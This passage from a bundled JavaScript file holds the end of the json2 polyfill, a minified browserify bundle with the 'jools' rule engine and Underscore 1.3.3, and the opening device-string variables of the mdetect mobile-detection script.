  1231. if (replacer && typeof replacer !== 'function' &&
  1232. (typeof replacer !== 'object' ||
  1233. typeof replacer.length !== 'number')) {
  1234. throw new Error('JSON.stringify');
  1235. }
  1236.  
  1237. // Make a fake root object containing our value under the key of ''.
  1238. // Return the result of stringifying the value.
  1239.  
  1240. return str('', {'': value});
  1241. };
  1242. }
  1243.  
  1244.  
  1245. // If the JSON object does not yet have a parse method, give it one.
  1246.  
  1247. if (typeof JSON.parse !== 'function') {
  1248. JSON.parse = function (text, reviver) {
  1249.  
  1250. // The parse method takes a text and an optional reviver function, and returns
  1251. // a JavaScript value if the text is a valid JSON text.
  1252.  
  1253. var j;
  1254.  
  1255. function walk(holder, key) {
  1256.  
  1257. // The walk method is used to recursively walk the resulting structure so
  1258. // that modifications can be made.
  1259.  
  1260. var k, v, value = holder[key];
  1261. if (value && typeof value === 'object') {
  1262. for (k in value) {
  1263. if (Object.prototype.hasOwnProperty.call(value, k)) {
  1264. v = walk(value, k);
  1265. if (v !== undefined) {
  1266. value[k] = v;
  1267. } else {
  1268. delete value[k];
  1269. }
  1270. }
  1271. }
  1272. }
  1273. return reviver.call(holder, key, value);
  1274. }
  1275.  
  1276.  
  1277. // Parsing happens in four stages. In the first stage, we replace certain
  1278. // Unicode characters with escape sequences. JavaScript handles many characters
  1279. // incorrectly, either silently deleting them, or treating them as line endings.
  1280.  
  1281. text = String(text);
  1282. cx.lastIndex = 0;
  1283. if (cx.test(text)) {
  1284. text = text.replace(cx, function (a) {
  1285. return '\\u' +
  1286. ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
  1287. });
  1288. }
  1289.  
  1290. // In the second stage, we run the text against regular expressions that look
  1291. // for non-JSON patterns. We are especially concerned with '()' and 'new'
  1292. // because they can cause invocation, and '=' because it can cause mutation.
  1293. // But just to be safe, we want to reject all unexpected forms.
  1294.  
  1295. // We split the second stage into 4 regexp operations in order to work around
  1296. // crippling inefficiencies in IE's and Safari's regexp engines. First we
  1297. // replace the JSON backslash pairs with '@' (a non-JSON character). Second, we
  1298. // replace all simple value tokens with ']' characters. Third, we delete all
  1299. // open brackets that follow a colon or comma or that begin the text. Finally,
  1300. // we look to see that the remaining characters are only whitespace or ']' or
  1301. // ',' or ':' or '{' or '}'. If that is so, then the text is safe for eval.
  1302.  
  1303. if (/^[\],:{}\s]*$/
  1304. .test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
  1305. .replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
  1306. .replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) {
  1307.  
  1308. // In the third stage we use the eval function to compile the text into a
  1309. // JavaScript structure. The '{' operator is subject to a syntactic ambiguity
  1310. // in JavaScript: it can begin a block or an object literal. We wrap the text
  1311. // in parens to eliminate the ambiguity.
  1312.  
  1313. j = eval('(' + text + ')');
  1314.  
  1315. // In the optional fourth stage, we recursively walk the new structure, passing
  1316. // each name/value pair to a reviver function for possible transformation.
  1317.  
  1318. return typeof reviver === 'function' ?
  1319. walk({'': j}, '') : j;
  1320. }
  1321.  
  1322. // If the text is not JSON parseable, then a SyntaxError is thrown.
  1323.  
  1324. throw new SyntaxError('JSON.parse');
  1325. };
  1326. }
  1327. }());
  1328.  
  1329.  
  1330. var require=function(file,cwd){var resolved=require.resolve(file,cwd||"/");var mod=require.modules[resolved];if(!mod){throw new Error("Failed to resolve module "+file+", tried "+resolved)}var res=mod._cached?mod._cached:mod();return res};require.paths=[];require.modules={};require.extensions=[".js",".coffee"];require._core={assert:true,events:true,fs:true,path:true,vm:true};require.resolve=(function(){return function(x,cwd){if(!cwd){cwd="/"}if(require._core[x]){return x}var path=require.modules.path();cwd=path.resolve("/",cwd);var y=cwd||"/";if(x.match(/^(?:\.\.?\/|\/)/)){var m=loadAsFileSync(path.resolve(y,x))||loadAsDirectorySync(path.resolve(y,x));if(m){return m}}var n=loadNodeModulesSync(x,y);if(n){return n}throw new Error("Cannot find module '"+x+"'");function loadAsFileSync(x){if(require.modules[x]){return x}for(var i=0;i<require.extensions.length;i++){var ext=require.extensions[i];if(require.modules[x+ext]){return x+ext}}}function loadAsDirectorySync(x){x=x.replace(/\/+$/,"");var pkgfile=x+"/package.json";if(require.modules[pkgfile]){var pkg=require.modules[pkgfile]();var b=pkg.browserify;if(typeof b==="object"&&b.main){var m=loadAsFileSync(path.resolve(x,b.main));if(m){return m}}else{if(typeof b==="string"){var m=loadAsFileSync(path.resolve(x,b));if(m){return m}}else{if(pkg.main){var m=loadAsFileSync(path.resolve(x,pkg.main));if(m){return m}}}}}return loadAsFileSync(x+"/index")}function loadNodeModulesSync(x,start){var dirs=nodeModulesPathsSync(start);for(var i=0;i<dirs.length;i++){var dir=dirs[i];var m=loadAsFileSync(dir+"/"+x);if(m){return m}var n=loadAsDirectorySync(dir+"/"+x);if(n){return n}}var m=loadAsFileSync(x);if(m){return m}}function nodeModulesPathsSync(start){var parts;if(start==="/"){parts=[""]}else{parts=path.normalize(start).split("/")}var dirs=[];for(var i=parts.length-1;i>=0;i--){if(parts[i]==="node_modules"){continue}var dir=parts.slice(0,i+1).join("/")+"/node_modules";dirs.push(dir)}return dirs}}})();require.alias=function(from,to){var path=require.modules.path();var res=null;try{res=require.resolve(from+"/package.json","/")}catch(err){res=require.resolve(from,"/")}var basedir=path.dirname(res);var keys=(Object.keys||function(obj){var res=[];for(var key in obj){res.push(key)}return res})(require.modules);for(var i=0;i<keys.length;i++){var key=keys[i];if(key.slice(0,basedir.length+1)===basedir+"/"){var f=key.slice(basedir.length);require.modules[to+f]=require.modules[basedir+f]}else{if(key===basedir){require.modules[to]=require.modules[basedir]}}}};require.define=function(filename,fn){var dirname=require._core[filename]?"":require.modules.path().dirname(filename);var require_=function(file){return require(file,dirname)};require_.resolve=function(name){return require.resolve(name,dirname)};require_.modules=require.modules;require_.define=require.define;var module_={exports:{}};require.modules[filename]=function(){require.modules[filename]._cached=module_.exports;fn.call(module_.exports,require_,module_,module_.exports,dirname,filename);require.modules[filename]._cached=module_.exports;return module_.exports}};if(typeof process==="undefined"){process={}}if(!process.nextTick){process.nextTick=(function(){var queue=[];var canPost=typeof window!=="undefined"&&window.postMessage&&window.addEventListener;if(canPost){window.addEventListener("message",function(ev){if(ev.source===window&&ev.data==="browserify-tick"){ev.stopPropagation();if(queue.length>0){var fn=queue.shift();fn()}}},true)}return function(fn){if(canPost){queue.push(fn);window.postMessage("browserify-tick","*")}else{setTimeout(fn,0)}}})()}if(!process.title){process.title="browser"}if(!process.binding){process.binding=function(name){if(name==="evals"){return require("vm")}else{throw new Error("No such module")}}}if(!process.cwd){process.cwd=function(){return"."}}if(!process.env){process.env={}}if(!process.argv){process.argv=[]}require.define("path",function(require,module,exports,__dirname,__filename){function filter(xs,fn){var res=[];for(var i=0;i<xs.length;i++){if(fn(xs[i],i,xs)){res.push(xs[i])}}return res}function normalizeArray(parts,allowAboveRoot){var up=0;for(var i=parts.length;i>=0;i--){var last=parts[i];if(last=="."){parts.splice(i,1)}else{if(last===".."){parts.splice(i,1);up++}else{if(up){parts.splice(i,1);up--}}}}if(allowAboveRoot){for(;up--;up){parts.unshift("..")}}return parts}var splitPathRe=/^(.+\/(?!$)|\/)?((?:.+?)?(\.[^.]*)?)$/;exports.resolve=function(){var resolvedPath="",resolvedAbsolute=false;for(var i=arguments.length;i>=-1&&!resolvedAbsolute;i--){var path=(i>=0)?arguments[i]:process.cwd();if(typeof path!=="string"||!path){continue}resolvedPath=path+"/"+resolvedPath;resolvedAbsolute=path.charAt(0)==="/"}resolvedPath=normalizeArray(filter(resolvedPath.split("/"),function(p){return !!p}),!resolvedAbsolute).join("/");return((resolvedAbsolute?"/":"")+resolvedPath)||"."};exports.normalize=function(path){var isAbsolute=path.charAt(0)==="/",trailingSlash=path.slice(-1)==="/";path=normalizeArray(filter(path.split("/"),function(p){return !!p}),!isAbsolute).join("/");if(!path&&!isAbsolute){path="."}if(path&&trailingSlash){path+="/"}return(isAbsolute?"/":"")+path};exports.join=function(){var paths=Array.prototype.slice.call(arguments,0);return exports.normalize(filter(paths,function(p,index){return p&&typeof p==="string"}).join("/"))};exports.dirname=function(path){var dir=splitPathRe.exec(path)[1]||"";var isWindows=false;if(!dir){return"."}else{if(dir.length===1||(isWindows&&dir.length<=3&&dir.charAt(1)===":")){return dir}else{return dir.substring(0,dir.length-1)}}};exports.basename=function(path,ext){var f=splitPathRe.exec(path)[2]||"";if(ext&&f.substr(-1*ext.length)===ext){f=f.substr(0,f.length-ext.length)}return f};exports.extname=function(path){return splitPathRe.exec(path)[3]||""}});require.define("/node_modules/jools/package.json",function(require,module,exports,__dirname,__filename){module.exports={main:"./lib/jools"}});require.define("/node_modules/jools/lib/jools.js",function(require,module,exports,__dirname,__filename){var utils=require("./utils"),_=require("underscore");exports.version="0.0.1";function Jools(rules){this.rules=rules}Jools.prototype.execute=function(fact){var self=this,session=_.clone(fact),last_session=_.clone(fact),goal=false;while(!goal){var changes=false;for(var x=0;x<this.rules.length;x++){var rule=this.rules[x],outcome;_.flatten([rule.condition]).forEach(function(cnd){cnd.__args=cnd.__args||utils.paramNames(cnd);if(outcome){outcome=outcome&&cnd.apply({},utils.paramsToArguments(session,cnd.__args))}else{outcome=cnd.apply({},utils.paramsToArguments(session,cnd.__args))}});if(outcome){_.flatten([rule.consequence]).forEach(function(csq){csq.__args=csq.__args||utils.paramNames(csq);csq.apply(session,utils.paramsToArguments(fact,csq.__args));if(!_.isEqual(last_session,session)){changes=true;last_session=_.clone(session)}})}if(changes){break}}if(!changes){goal=true}}return session};module.exports=Jools});require.define("/node_modules/jools/lib/utils.js",function(require,module,exports,__dirname,__filename){module.exports.paramNames=function(f){var m=/function[^\(]*\(([^\)]*)\)/.exec(f.toString());if(!m){throw new TypeError("Invalid functions")}var params=[];m[1].split(",").forEach(function(p){params.push(p.replace(/^\s*|\s*$/g,""))});return params};module.exports.paramsToArguments=function(obj,params){var args=[];params.forEach(function(p){args.push(obj[p])});return args}});require.define("/node_modules/underscore/package.json",function(require,module,exports,__dirname,__filename){module.exports={main:"underscore.js"}});require.define("/node_modules/underscore/underscore.js",function(require,module,exports,__dirname,__filename){(function(){var root=this;var previousUnderscore=root._;var breaker={};var ArrayProto=Array.prototype,ObjProto=Object.prototype,FuncProto=Function.prototype;var slice=ArrayProto.slice,unshift=ArrayProto.unshift,toString=ObjProto.toString,hasOwnProperty=ObjProto.hasOwnProperty;var nativeForEach=ArrayProto.forEach,nativeMap=ArrayProto.map,nativeReduce=ArrayProto.reduce,nativeReduceRight=ArrayProto.reduceRight,nativeFilter=ArrayProto.filter,nativeEvery=ArrayProto.every,nativeSome=ArrayProto.some,nativeIndexOf=ArrayProto.indexOf,nativeLastIndexOf=ArrayProto.lastIndexOf,nativeIsArray=Array.isArray,nativeKeys=Object.keys,nativeBind=FuncProto.bind;var _=function(obj){return new wrapper(obj)};if(typeof exports!=="undefined"){if(typeof module!=="undefined"&&module.exports){exports=module.exports=_}exports._=_}else{root._=_}_.VERSION="1.3.3";var each=_.each=_.forEach=function(obj,iterator,context){if(obj==null){return}if(nativeForEach&&obj.forEach===nativeForEach){obj.forEach(iterator,context)}else{if(obj.length===+obj.length){for(var i=0,l=obj.length;i<l;i++){if(i in obj&&iterator.call(context,obj[i],i,obj)===breaker){return}}}else{for(var key in obj){if(_.has(obj,key)){if(iterator.call(context,obj[key],key,obj)===breaker){return}}}}}};_.map=_.collect=function(obj,iterator,context){var results=[];if(obj==null){return results}if(nativeMap&&obj.map===nativeMap){return obj.map(iterator,context)}each(obj,function(value,index,list){results[results.length]=iterator.call(context,value,index,list)});if(obj.length===+obj.length){results.length=obj.length}return results};_.reduce=_.foldl=_.inject=function(obj,iterator,memo,context){var initial=arguments.length>2;if(obj==null){obj=[]}if(nativeReduce&&obj.reduce===nativeReduce){if(context){iterator=_.bind(iterator,context)}return initial?obj.reduce(iterator,memo):obj.reduce(iterator)}each(obj,function(value,index,list){if(!initial){memo=value;initial=true}else{memo=iterator.call(context,memo,value,index,list)}});if(!initial){throw new TypeError("Reduce of empty array with no initial value")}return memo};_.reduceRight=_.foldr=function(obj,iterator,memo,context){var initial=arguments.length>2;if(obj==null){obj=[]}if(nativeReduceRight&&obj.reduceRight===nativeReduceRight){if(context){iterator=_.bind(iterator,context)}return initial?obj.reduceRight(iterator,memo):obj.reduceRight(iterator)}var reversed=_.toArray(obj).reverse();if(context&&!initial){iterator=_.bind(iterator,context)}return initial?_.reduce(reversed,iterator,memo,context):_.reduce(reversed,iterator)};_.find=_.detect=function(obj,iterator,context){var result;any(obj,function(value,index,list){if(iterator.call(context,value,index,list)){result=value;return true}});return result};_.filter=_.select=function(obj,iterator,context){var results=[];if(obj==null){return results}if(nativeFilter&&obj.filter===nativeFilter){return obj.filter(iterator,context)}each(obj,function(value,index,list){if(iterator.call(context,value,index,list)){results[results.length]=value}});return results};_.reject=function(obj,iterator,context){var results=[];if(obj==null){return results}each(obj,function(value,index,list){if(!iterator.call(context,value,index,list)){results[results.length]=value}});return results};_.every=_.all=function(obj,iterator,context){var result=true;if(obj==null){return result}if(nativeEvery&&obj.every===nativeEvery){return obj.every(iterator,context)}each(obj,function(value,index,list){if(!(result=result&&iterator.call(context,value,index,list))){return breaker}});return !!result};var any=_.some=_.any=function(obj,iterator,context){iterator||(iterator=_.identity);var result=false;if(obj==null){return result}if(nativeSome&&obj.some===nativeSome){return obj.some(iterator,context)}each(obj,function(value,index,list){if(result||(result=iterator.call(context,value,index,list))){return breaker}});return !!result};_.include=_.contains=function(obj,target){var found=false;if(obj==null){return found}if(nativeIndexOf&&obj.indexOf===nativeIndexOf){return obj.indexOf(target)!=-1}found=any(obj,function(value){return value===target});return found};_.invoke=function(obj,method){var args=slice.call(arguments,2);return _.map(obj,function(value){return(_.isFunction(method)?method||value:value[method]).apply(value,args)})};_.pluck=function(obj,key){return _.map(obj,function(value){return value[key]})};_.max=function(obj,iterator,context){if(!iterator&&_.isArray(obj)&&obj[0]===+obj[0]){return Math.max.apply(Math,obj)}if(!iterator&&_.isEmpty(obj)){return -Infinity}var result={computed:-Infinity};each(obj,function(value,index,list){var computed=iterator?iterator.call(context,value,index,list):value;computed>=result.computed&&(result={value:value,computed:computed})});return result.value};_.min=function(obj,iterator,context){if(!iterator&&_.isArray(obj)&&obj[0]===+obj[0]){return Math.min.apply(Math,obj)}if(!iterator&&_.isEmpty(obj)){return Infinity}var result={computed:Infinity};each(obj,function(value,index,list){var computed=iterator?iterator.call(context,value,index,list):value;computed<result.computed&&(result={value:value,computed:computed})});return result.value};_.shuffle=function(obj){var shuffled=[],rand;each(obj,function(value,index,list){rand=Math.floor(Math.random()*(index+1));shuffled[index]=shuffled[rand];shuffled[rand]=value});return shuffled};_.sortBy=function(obj,val,context){var iterator=_.isFunction(val)?val:function(obj){return obj[val]};return _.pluck(_.map(obj,function(value,index,list){return{value:value,criteria:iterator.call(context,value,index,list)}}).sort(function(left,right){var a=left.criteria,b=right.criteria;if(a===void 0){return 1}if(b===void 0){return -1}return a<b?-1:a>b?1:0}),"value")};_.groupBy=function(obj,val){var result={};var iterator=_.isFunction(val)?val:function(obj){return obj[val]};each(obj,function(value,index){var key=iterator(value,index);(result[key]||(result[key]=[])).push(value)});return result};_.sortedIndex=function(array,obj,iterator){iterator||(iterator=_.identity);var low=0,high=array.length;while(low<high){var mid=(low+high)>>1;iterator(array[mid])<iterator(obj)?low=mid+1:high=mid}return low};_.toArray=function(obj){if(!obj){return[]}if(_.isArray(obj)){return slice.call(obj)}if(_.isArguments(obj)){return slice.call(obj)}if(obj.toArray&&_.isFunction(obj.toArray)){return obj.toArray()}return _.values(obj)};_.size=function(obj){return _.isArray(obj)?obj.length:_.keys(obj).length};_.first=_.head=_.take=function(array,n,guard){return(n!=null)&&!guard?slice.call(array,0,n):array[0]};_.initial=function(array,n,guard){return slice.call(array,0,array.length-((n==null)||guard?1:n))};_.last=function(array,n,guard){if((n!=null)&&!guard){return slice.call(array,Math.max(array.length-n,0))}else{return array[array.length-1]}};_.rest=_.tail=function(array,index,guard){return slice.call(array,(index==null)||guard?1:index)};_.compact=function(array){return _.filter(array,function(value){return !!value})};_.flatten=function(array,shallow){return _.reduce(array,function(memo,value){if(_.isArray(value)){return memo.concat(shallow?value:_.flatten(value))}memo[memo.length]=value;return memo},[])};_.without=function(array){return _.difference(array,slice.call(arguments,1))};_.uniq=_.unique=function(array,isSorted,iterator){var initial=iterator?_.map(array,iterator):array;var results=[];if(array.length<3){isSorted=true}_.reduce(initial,function(memo,value,index){if(isSorted?_.last(memo)!==value||!memo.length:!_.include(memo,value)){memo.push(value);results.push(array[index])}return memo},[]);return results};_.union=function(){return _.uniq(_.flatten(arguments,true))};_.intersection=_.intersect=function(array){var rest=slice.call(arguments,1);return _.filter(_.uniq(array),function(item){return _.every(rest,function(other){return _.indexOf(other,item)>=0})})};_.difference=function(array){var rest=_.flatten(slice.call(arguments,1),true);return _.filter(array,function(value){return !_.include(rest,value)})};_.zip=function(){var args=slice.call(arguments);var length=_.max(_.pluck(args,"length"));var results=new Array(length);for(var i=0;i<length;i++){results[i]=_.pluck(args,""+i)}return results};_.indexOf=function(array,item,isSorted){if(array==null){return -1}var i,l;if(isSorted){i=_.sortedIndex(array,item);return array[i]===item?i:-1}if(nativeIndexOf&&array.indexOf===nativeIndexOf){return array.indexOf(item)}for(i=0,l=array.length;i<l;i++){if(i in array&&array[i]===item){return i}}return -1};_.lastIndexOf=function(array,item){if(array==null){return -1}if(nativeLastIndexOf&&array.lastIndexOf===nativeLastIndexOf){return array.lastIndexOf(item)}var i=array.length;while(i--){if(i in array&&array[i]===item){return i}}return -1};_.range=function(start,stop,step){if(arguments.length<=1){stop=start||0;start=0}step=arguments[2]||1;var len=Math.max(Math.ceil((stop-start)/step),0);var idx=0;var range=new Array(len);while(idx<len){range[idx++]=start;start+=step}return range};var ctor=function(){};_.bind=function bind(func,context){var bound,args;if(func.bind===nativeBind&&nativeBind){return nativeBind.apply(func,slice.call(arguments,1))}if(!_.isFunction(func)){throw new TypeError}args=slice.call(arguments,2);return bound=function(){if(!(this instanceof bound)){return func.apply(context,args.concat(slice.call(arguments)))}ctor.prototype=func.prototype;var self=new ctor;var result=func.apply(self,args.concat(slice.call(arguments)));if(Object(result)===result){return result}return self}};_.bindAll=function(obj){var funcs=slice.call(arguments,1);if(funcs.length==0){funcs=_.functions(obj)}each(funcs,function(f){obj[f]=_.bind(obj[f],obj)});return obj};_.memoize=function(func,hasher){var memo={};hasher||(hasher=_.identity);return function(){var key=hasher.apply(this,arguments);return _.has(memo,key)?memo[key]:(memo[key]=func.apply(this,arguments))}};_.delay=function(func,wait){var args=slice.call(arguments,2);return setTimeout(function(){return func.apply(null,args)},wait)};_.defer=function(func){return _.delay.apply(_,[func,1].concat(slice.call(arguments,1)))};_.throttle=function(func,wait){var context,args,timeout,throttling,more,result;var whenDone=_.debounce(function(){more=throttling=false},wait);return function(){context=this;args=arguments;var later=function(){timeout=null;if(more){func.apply(context,args)}whenDone()};if(!timeout){timeout=setTimeout(later,wait)}if(throttling){more=true}else{result=func.apply(context,args)}whenDone();throttling=true;return result}};_.debounce=function(func,wait,immediate){var timeout;return function(){var context=this,args=arguments;var later=function(){timeout=null;if(!immediate){func.apply(context,args)}};if(immediate&&!timeout){func.apply(context,args)}clearTimeout(timeout);timeout=setTimeout(later,wait)}};_.once=function(func){var ran=false,memo;return function(){if(ran){return memo}ran=true;return memo=func.apply(this,arguments)}};_.wrap=function(func,wrapper){return function(){var args=[func].concat(slice.call(arguments,0));return wrapper.apply(this,args)}};_.compose=function(){var funcs=arguments;return function(){var args=arguments;for(var i=funcs.length-1;i>=0;i--){args=[funcs[i].apply(this,args)]}return args[0]}};_.after=function(times,func){if(times<=0){return func()}return function(){if(--times<1){return func.apply(this,arguments)}}};_.keys=nativeKeys||function(obj){if(obj!==Object(obj)){throw new TypeError("Invalid object")}var keys=[];for(var key in obj){if(_.has(obj,key)){keys[keys.length]=key}}return keys};_.values=function(obj){return _.map(obj,_.identity)};_.functions=_.methods=function(obj){var names=[];for(var key in obj){if(_.isFunction(obj[key])){names.push(key)}}return names.sort()};_.extend=function(obj){each(slice.call(arguments,1),function(source){for(var prop in source){obj[prop]=source[prop]}});return obj};_.pick=function(obj){var result={};each(_.flatten(slice.call(arguments,1)),function(key){if(key in obj){result[key]=obj[key]}});return result};_.defaults=function(obj){each(slice.call(arguments,1),function(source){for(var prop in source){if(obj[prop]==null){obj[prop]=source[prop]}}});return obj};_.clone=function(obj){if(!_.isObject(obj)){return obj}return _.isArray(obj)?obj.slice():_.extend({},obj)};_.tap=function(obj,interceptor){interceptor(obj);return obj};function eq(a,b,stack){if(a===b){return a!==0||1/a==1/b}if(a==null||b==null){return a===b}if(a._chain){a=a._wrapped}if(b._chain){b=b._wrapped}if(a.isEqual&&_.isFunction(a.isEqual)){return a.isEqual(b)}if(b.isEqual&&_.isFunction(b.isEqual)){return b.isEqual(a)}var className=toString.call(a);if(className!=toString.call(b)){return false}switch(className){case"[object String]":return a==String(b);case"[object Number]":return a!=+a?b!=+b:(a==0?1/a==1/b:a==+b);case"[object Date]":case"[object Boolean]":return +a==+b;case"[object RegExp]":return a.source==b.source&&a.global==b.global&&a.multiline==b.multiline&&a.ignoreCase==b.ignoreCase}if(typeof a!="object"||typeof b!="object"){return false}var length=stack.length;while(length--){if(stack[length]==a){return true}}stack.push(a);var size=0,result=true;if(className=="[object Array]"){size=a.length;result=size==b.length;if(result){while(size--){if(!(result=size in a==size in b&&eq(a[size],b[size],stack))){break}}}}else{if("constructor" in a!="constructor" in b||a.constructor!=b.constructor){return false}for(var key in a){if(_.has(a,key)){size++;if(!(result=_.has(b,key)&&eq(a[key],b[key],stack))){break}}}if(result){for(key in b){if(_.has(b,key)&&!(size--)){break}}result=!size}}stack.pop();return result}_.isEqual=function(a,b){return eq(a,b,[])};_.isEmpty=function(obj){if(obj==null){return true}if(_.isArray(obj)||_.isString(obj)){return obj.length===0}for(var key in obj){if(_.has(obj,key)){return false}}return true};_.isElement=function(obj){return !!(obj&&obj.nodeType==1)};_.isArray=nativeIsArray||function(obj){return toString.call(obj)=="[object Array]"};_.isObject=function(obj){return obj===Object(obj)};_.isArguments=function(obj){return toString.call(obj)=="[object Arguments]"};if(!_.isArguments(arguments)){_.isArguments=function(obj){return !!(obj&&_.has(obj,"callee"))}}_.isFunction=function(obj){return toString.call(obj)=="[object Function]"};_.isString=function(obj){return toString.call(obj)=="[object String]"};_.isNumber=function(obj){return toString.call(obj)=="[object Number]"};_.isFinite=function(obj){return _.isNumber(obj)&&isFinite(obj)};_.isNaN=function(obj){return obj!==obj};_.isBoolean=function(obj){return obj===true||obj===false||toString.call(obj)=="[object Boolean]"};_.isDate=function(obj){return toString.call(obj)=="[object Date]"};_.isRegExp=function(obj){return toString.call(obj)=="[object RegExp]"};_.isNull=function(obj){return obj===null};_.isUndefined=function(obj){return obj===void 0};_.has=function(obj,key){return hasOwnProperty.call(obj,key)};_.noConflict=function(){root._=previousUnderscore;return this};_.identity=function(value){return value};_.times=function(n,iterator,context){for(var i=0;i<n;i++){iterator.call(context,i)}};_.escape=function(string){return(""+string).replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#x27;").replace(/\//g,"&#x2F;")};_.result=function(object,property){if(object==null){return null}var value=object[property];return _.isFunction(value)?value.call(object):value};_.mixin=function(obj){each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name])})};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id};_.templateSettings={evaluate:/<::([\s\S]+?)::>/g,interpolate:/<::=([\s\S]+?)::>/g,escape:/<:-([\s\S]+?):>/g};var noMatch=/.^/;var escapes={"\\":"\\","'":"'",r:"\r",n:"\n",t:"\t",u2028:"\u2028",u2029:"\u2029"};for(var p in escapes){escapes[escapes[p]]=p}var escaper=/\\|'|\r|\n|\t|\u2028|\u2029/g;var unescaper=/\\(\\|'|r|n|t|u2028|u2029)/g;var unescape=function(code){return code.replace(unescaper,function(match,escape){return escapes[escape]})};_.template=function(text,data,settings){settings=_.defaults(settings||{},_.templateSettings);var source="__p+='"+text.replace(escaper,function(match){return"\\"+escapes[match]}).replace(settings.escape||noMatch,function(match,code){return"'+\n_.escape("+unescape(code)+")+\n'"}).replace(settings.interpolate||noMatch,function(match,code){return"'+\n("+unescape(code)+")+\n'"}).replace(settings.evaluate||noMatch,function(match,code){return"';\n"+unescape(code)+"\n;__p+='"})+"';\n";if(!settings.variable){source="with(obj||{}){\n"+source+"}\n"}source="var __p='';var print=function(){__p+=Array.prototype.join.call(arguments, '')};\n"+source+"return __p;\n";var render=new Function(settings.variable||"obj","_",source);if(data){return render(data,_)}var template=function(data){return render.call(this,data,_)};template.source="function("+(settings.variable||"obj")+"){\n"+source+"}";return template};_.chain=function(obj){return _(obj).chain()};var wrapper=function(obj){this._wrapped=obj};_.prototype=wrapper.prototype;var result=function(obj,chain){return chain?_(obj).chain():obj};var addToWrapper=function(name,func){wrapper.prototype[name]=function(){var args=slice.call(arguments);unshift.call(args,this._wrapped);return result(func.apply(_,args),this._chain)}};_.mixin(_);each(["pop","push","reverse","shift","sort","splice","unshift"],function(name){var method=ArrayProto[name];wrapper.prototype[name]=function(){var wrapped=this._wrapped;method.apply(wrapped,arguments);var length=wrapped.length;if((name=="shift"||name=="splice")&&length===0){delete wrapped[0]}return result(wrapped,this._chain)}});each(["concat","join","slice"],function(name){var method=ArrayProto[name];wrapper.prototype[name]=function(){return result(method.apply(this._wrapped,arguments),this._chain)}});wrapper.prototype.chain=function(){this._chain=true;return this};wrapper.prototype.value=function(){return this._wrapped}}).call(this)});
  1331.  
  1332.  
  1333. /* *******************************************
  1334. // Copyright 2010-2012, Anthony Hand
  1335. // mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
  1336. // LICENSE INFORMATION
  1337. // Licensed under the Apache License, Version 2.0 (the "License");
  1338. // you may not use this file except in compliance with the License.
  1339. // You may obtain a copy of the License at
  1340. // http://www.apache.org/licenses/LICENSE-2.0
  1341. // Unless required by applicable law or agreed to in writing,
  1342. // software distributed under the License is distributed on an
  1343. // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
  1344. // either express or implied. See the License for the specific
  1345. // language governing permissions and limitations under the License.
  1346. // *******************************************
  1347. */
  1348.  
  1349. var isIphone = false;
  1350. var isAndroidPhone = false;
  1351. var isTierTablet = false;
  1352. var isTierIphone = false;
  1353. var isTierRichCss = false;
  1354. var isTierGenericMobile = false;
  1355.  
  1356. var engineWebKit = "webkit";
  1357. var deviceIphone = "iphone";
  1358. var deviceIpod = "ipod";
  1359. var deviceIpad = "ipad";
  1360. var deviceMacPpc = "macintosh"; //Used for disambiguation
  1361.  
  1362. var deviceAndroid = "android";
  1363. var deviceGoogleTV = "googletv";
  1364. var deviceXoom = "xoom"; //Motorola Xoom
  1365. var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
  1366.  
  1367. var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
  1368.  
  1369. var deviceSymbian = "symbian";
  1370. var deviceS60 = "series60";
  1371. var deviceS70 = "series70";
  1372. var deviceS80 = "series80";
  1373. var deviceS90 = "series90";
  1374.  
  1375. var deviceWinPhone7 = "windows phone os 7";
  1376. var deviceWinMob = "windows ce";
  1377. var deviceWindows = "windows";
  1378. var deviceIeMob = "iemobile";
  1379. var devicePpc = "ppc"; //Stands for PocketPC
  1380. var enginePie = "wm5 pie"; //An old Windows Mobile
  1381.  
  1382. var deviceBB = "blackberry";
  1383. var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
  1384. var deviceBBStorm = "blackberry95"; //Storm 1 and 2
  1385. var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
  1386. var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
  1387. var deviceBBTour = "blackberry96"; //Tour
  1388. var deviceBBCurve = "blackberry89"; //Curve 2
  1389. var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
  1390. var deviceBBTorch = "blackberry 98"; //Torch
  1391. var deviceBBPlaybook = "playbook"; //PlayBook tablet
  1392.  
  1393. var devicePalm = "palm";
  1394. var deviceWebOS = "webos"; //For Palm's line of WebOS devices
  1395. var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
  1396.  
  1397. var engineBlazer = "blazer"; //Old Palm browser
  1398. var engineXiino = "xiino";
  1399.  
  1400. var deviceKindle = "kindle"; //Amazon Kindle, eInk one
  1401. var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
  1402.  
  1403. var vndwap = "vnd.wap";
  1404. var wml = "wml";
  1405.  
  1406. var deviceTablet = "tablet"; //Generic term for slate and tablet devices
  1407. var deviceBrew = "brew";
  1408. var deviceDanger = "danger";
  1409. var deviceHiptop = "hiptop";
  1410. var devicePlaystation = "playstation";
  1411. var deviceNintendoDs = "nitro";
  1412. var deviceNintendo = "nintendo";
  1413. var deviceWii = "wii";
  1414. var deviceXbox = "xbox";
  1415. var deviceArchos = "archos";
  1416.  
  1417. var engineOpera = "opera"; //Popular browser
  1418. var engineNetfront = "netfront"; //Common embedded OS browser
  1419. var engineUpBrowser = "up.browser"; //common on some phones
  1420. var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
  1421. var deviceMidp = "midp"; //a mobile Java technology
  1422. var uplink = "up.link";
  1423. var engineTelecaQ = 'teleca q'; //a modern feature phone browser
  1424.  
